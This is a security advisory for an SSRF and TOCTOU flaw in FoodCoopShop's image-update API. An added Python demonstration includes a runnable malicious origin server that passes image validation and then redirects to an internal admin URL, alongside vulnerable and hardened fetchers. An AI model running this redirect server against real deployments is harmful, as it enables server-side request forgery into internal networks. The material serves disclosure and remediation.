PT-2023-30172 · Unknown · Foodcoopshop

Asesidaa · Published 2023-11-02 · Updated 2023-11-09 · CVE-2023-46725

CVSS v3.1: 8.1 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: FoodCoopShop versions prior to 3.6.1

Description: The issue is a server-side request forgery (SSRF). In the Network module, a manufacturer account can use the "/api/updateProducts.json" endpoint to make the server send a request to an arbitrary host, allowing the server to be used as a proxy into the internal network. In addition, the image validation is subject to a time-of-check to time-of-use (TOCTOU) flaw: the response that is checked is not the response that is used. An attacker can exploit this with a custom server that returns 200 on the HEAD request, a valid image on the first GET request, and a 302 redirect to the final target on the second GET request, which turns the limited request into a full SSRF.

Recommendations: For versions prior to 3.6.1, update to version 3.6.1 to fix the vulnerability. As a temporary workaround, consider restricting access to the "/api/updateProducts.json" endpoint in the Network module to minimize the risk of exploitation, and avoid using the data[data][0][image] parameter of the affected API endpoint until the update is applied.
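The check-then-use sequence described above, as an added example that is neither FoodCoopShop's code nor part of the original advisory: a small stateful origin that answers HEAD with 200, the first GET with a valid image and the second GET with a 302, beside a fetcher that validates one response and stores another (the TOCTOU pattern) and a fetcher that validates exactly the bytes it keeps, refuses redirects and refuses non-public destinations. The hostnames, IP addresses, the internal target URL and the PNG bytes are constructed for the example and are not taken from the advisory.

```python
"""Added example, not FoodCoopShop code: models the TOCTOU image-validation
SSRF from the advisory. Hosts, IPs, URLs and image bytes are made up."""
import ipaddress
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Constructed test data: the PNG signature is enough to pass a naive image check.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
FAKE_PNG = PNG_MAGIC + b"\x00" * 16
INTERNAL_TARGET = "http://10.0.0.5/admin"  # assumed internal URL, illustrative only


class ToctouImageHost:
    """The attacker's origin: 200 on HEAD, a valid image on the first GET,
    and a 302 to the internal target on every later GET."""

    def __init__(self, target=INTERNAL_TARGET):
        self.target = target
        self.gets = 0

    def respond(self, method):
        """Return (status, headers, body) for one request."""
        if method == "HEAD":
            return 200, {"Content-Type": "image/png"}, b""
        self.gets += 1
        if self.gets == 1:
            return 200, {"Content-Type": "image/png"}, FAKE_PNG
        return 302, {"Location": self.target}, b""


def make_handler(host):
    """Wrap the state machine in a real HTTP handler so it can be served."""
    class Handler(BaseHTTPRequestHandler):
        def _reply(self):
            status, headers, body = host.respond(self.command)
            self.send_response(status)
            for name, value in headers.items():
                self.send_header(name, value)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        do_HEAD = do_GET = _reply
    return Handler


def looks_like_image(body):
    return body.startswith(PNG_MAGIC)


def vulnerable_fetch(origin):
    """Check-then-use: the checked GET and the stored GET are different requests,
    and the second one follows redirects. Returns the URL the final request hit."""
    status, _, _ = origin.respond("HEAD")
    if status != 200:
        return None
    _, _, checked = origin.respond("GET")          # time of check
    if not looks_like_image(checked):
        return None
    url = "http://attacker.example/img.png"        # assumed attacker URL
    status, headers, _ = origin.respond("GET")     # time of use: a fresh request
    while status in (301, 302, 303, 307, 308):     # redirects followed blindly
        url = headers["Location"]
        status, headers = 200, {}                  # simulated reply from the target
    return url


def hardened_fetch(origin, url, resolve=socket.gethostbyname):
    """Single request, no redirects, public destinations only, and the bytes
    that are validated are the bytes that are stored (assumed policy)."""
    host = urlparse(url).hostname
    if host is None or not ipaddress.ip_address(resolve(host)).is_global:
        return None
    status, _, body = origin.respond("GET")
    if status != 200 or not looks_like_image(body):
        return None
    return body


if __name__ == "__main__":
    # Serve the attacker-side state machine locally to try a real client against it.
    HTTPServer(("127.0.0.1", 8000), make_handler(ToctouImageHost())).serve_forever()
```

Run the module to expose the malicious origin on 127.0.0.1:8000 and point any HEAD-then-GET-then-GET validator at it. Resolving the hostname and then connecting is itself a small time-of-check/time-of-use window (DNS rebinding), so a production fix should pin the connection to the address it validated rather than resolve twice.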

Exploit · Fix

Time Of Check To Time Of Use · SSRF


Weakness Enumeration

Related Identifiers

CVE-2023-46725
GHSA-JHWW-FX2J-3RF7

Affected Products

Foodcoopshop